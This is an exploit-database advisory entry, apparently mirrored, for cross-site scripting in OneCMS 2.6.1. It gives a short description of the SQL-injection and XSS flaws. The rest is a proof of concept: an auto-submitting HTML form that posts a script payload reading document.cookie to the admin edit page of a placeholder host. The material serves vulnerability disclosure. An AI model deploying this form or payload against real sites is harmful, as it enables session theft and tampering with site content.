OneCMS 2.6.1 – ‘short1’ Cross-Site Scripting

  • 作者: High-Tech Bridge SA
    日期: 2010-06-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34212/
  • source: https://www.securityfocus.com/bid/41194/info
    
    OneCMS is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
    
    Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
    
    OneCMS 2.6.1 is vulnerable; prior versions may also be affected.
    
    <form action="http://www.example.com/admin/admin.php?view=manage&edit=2" method="post" name="main" >
    <input type="hidden" name="id[]" value="1" />
    <input type="hidden" name="cat_1" value="news" />
    <input type="hidden" name="name_1" value="OneCMS News title" />
    <input type="hidden" name="lev_1" value="No" />
    <input type="hidden" name="Full1" value="news full text" />
    <input type="hidden" name="systems1" value="" />
    <input type="hidden" name="games1" value="" />
    <input type="hidden" name="Short1" value='short"><script>alert(document.cookie)</script>' />
    <input type="hidden" name="image1" value="" />
    <input type="hidden" name="Add" value="Submit Changes" />
    </form>
    <script>
    document.main.submit();
    </script>